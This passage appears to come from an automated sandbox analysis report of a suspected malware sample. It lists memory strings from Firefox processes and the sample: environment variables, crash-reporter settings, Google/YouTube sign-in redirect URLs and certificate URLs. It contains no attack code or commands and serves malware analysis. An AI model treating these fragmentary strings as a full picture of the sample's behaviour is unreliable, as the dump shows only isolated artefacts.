ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 
(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3295117428.00000221E2134000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 
(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3292463596.0000022B01654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 
(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsz[ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2790450714.00000291F3C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 
(x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCS equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8D5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76O59q3kZuVkEikshcjAqxUN8FNn3aweiPynOeRPtNl-mQkf3AYfHIp2ju47tXoxYdAUO-i equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2790450714.00000291F3C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/account9 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: about:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: accounts.google.comwww.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: accounts.google.comwww.youtube.com"- equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: ahttps://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I74Ty1k4SceekYc-6if7fWi3AcAALn1pou-ox3lp9iTb0DdbPvF0pDppPqh7hSf65ZuMwb5J&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S473483422%3A1722017432215720&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: h3realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%2526feature%253Dredirect_login equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76O59q3kZuVkEikshcjAqxUN8FNn3aweiPynOeRPtNl-mQkf3AYfHIp2ju47tXoxYdAUO-i equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3223621375.0000016DEE3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I77EVwBCWklE9qIBneDMIiwFWCCFTErG2FyxHopmLBm9ld0zmag6hfnN6yKuG81xlYfRS6YoZQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1379105066%3A1722017451321129&ddm=0 equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I74Ty1k4SceekYc-6if7fWi3AcAALn1pou-ox3lp9iTb0DdbPvF0pDppPqh7hSf65ZuMwb5J&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S473483422%3A1722017432215720&ddm=0 equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I74Ty1k4SceekYc-6if7fWi3AcAALn1pou-ox3lp9iTb0DdbPvF0pDppPqh7hSf65ZuMwb5J&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S473483422%3A1722017432215720&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I75aNkmYhtF_MmgmHjGWmp0oL3UvNytgZNbpUtsHuVRyXxpuwTtrRtVZa0mplhYWnP6By8Z9Ww&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1357171065%3A1722017418669557&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/favicons/facebook-com.icohttps://www.aliexpress.com/nimbus-desktop-experimentsimages/leboncoin-fr@2x.png_generateVariablesOnlySchemafavicons/leboncoin-fr.pngimages/aliexpress-com@2x.pngoptInToExperiment/branch<_validateBranches/schema<nimbus:enrollments-updated did not match due to targetingmain/nimbus-desktop-experiments equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2883300923.0000016DDF28C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: ee7a49fbf0.exe, 00000018.00000003.2729921737.0000000002517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https:www.youtube.com:443:www.youtube.com:443::n:1724609447:h3:y:1722017420:n:^partitionKey=%28https%2Cyoutube.com%29:|n:y: equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: mhttps://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I75aNkmYhtF_MmgmHjGWmp0oL3UvNytgZNbpUtsHuVRyXxpuwTtrRtVZa0mplhYWnP6By8Z9Ww&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1357171065%3A1722017418669557&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3295117428.00000221E2130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3292463596.0000022B01650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla FirjZ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: phttps://www.youtube.com/account --attempting-deelevation( equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3218619086.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3199884339.0000016DEE25A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: firefox.exe, 00000021.00000003.3165123543.0000016DDEA8C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165123543.0000016DDEA87000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/wr2/GSyT1N4PBrg.crl0
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000021.00000003.2891272921.0000016DDE4B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
